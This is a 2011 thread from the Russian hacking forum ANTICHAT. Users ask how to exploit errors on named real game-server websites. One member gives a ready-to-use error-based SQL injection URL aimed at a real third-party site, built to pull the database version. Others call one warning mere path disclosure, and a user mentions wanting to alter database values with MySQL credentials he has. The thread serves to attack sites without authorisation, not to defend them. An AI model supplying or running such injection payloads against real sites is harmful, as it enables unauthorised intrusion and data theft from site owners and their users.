ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.05.2011, 17:29
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Ну в принципе я об этом тоже думал,логин и пасс от мускла у меня есть,только не расшифровывается)
Думал есть какие нить варианты как в таблице бд поменять значение.
|
|
|
01.06.2011, 00:33
|
|
Новичок
Регистрация: 30.05.2011
Сообщений: 3
Провел на форуме:
982
Репутация:
0
|
|
Помогите уважаемые гуру.
и так вот сайтик:
http://rswow.ru/page.php?p[]=rules
Вылазит такая штука
Сообщение от None
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in Y:\home\195.88.62.202\www\page.php on line 14
Подскажите как то заюзать данную штуку.
Заранее спасибо. |
|
|
|
01.06.2011, 00:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
|
|
|
|
01.06.2011, 00:38
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от 0x002
Помогите уважаемые гуру.
и так вот сайтик:
http://rswow.ru/page.php?p[]=rules
Вылазит такая штука
Подскажите как то заюзать данную штуку.
Заранее спасибо.
Например, так:
http://wow.war-top.ru/index.php?do=sitedetails&id=74'+and+(select+1+from +(select+count(0),concat((select+version()),floor( rand(0)*2))+from+(select+1+union+select+2+union+se lect+3)x+group+by+2+limit+1)a)+--+
|
|
|
|
01.06.2011, 00:54
|
|
Новичок
Регистрация: 30.05.2011
Сообщений: 3
Провел на форуме:
982
Репутация:
0
|
|
Сообщение от Konqi
mysql_real_escape_string() принимает параметр типа стринг, о чем и говорит имя фунцкии, а ты передаешь массив, вот и ругается..
Я понял что тип стринг
Сообщение от None
mysql_real_escape_string() - используется для защиты от sql атак
|
|
|
|
01.06.2011, 00:56
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 0x002
Я понял что тип стринг
Цитата:
mysql_real_escape_string() - используется для защиты от sql атак
и что?
ты же не будешь проверить на SQL injection через подставку массива вместо стринга
тебе выше показали запрос
|
|
|
|
01.06.2011, 01:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Раскрытие пути, не более того
|
|
|
|
01.06.2011, 02:19
|
|
Новичок
Регистрация: 30.05.2011
Сообщений: 3
Провел на форуме:
982
Репутация:
0
|
|
Прошу помощи
вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1
Сообщение от None
Check field dbinfo in table `realmlist` for realm id=
|
|
|
|
01.06.2011, 02:22
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от 0x002
Прошу помощи
вот http://wow.bridge.net.ua/index.php?n=server&sub=arena&realm=-1
Где ты там увидел уязвимость?
|
|
|
|
01.06.2011, 02:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
0x002 читай маны по скуль инъекциям =\
а то всю жизнь тебе кто то будет раскручивать недоскули =\
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
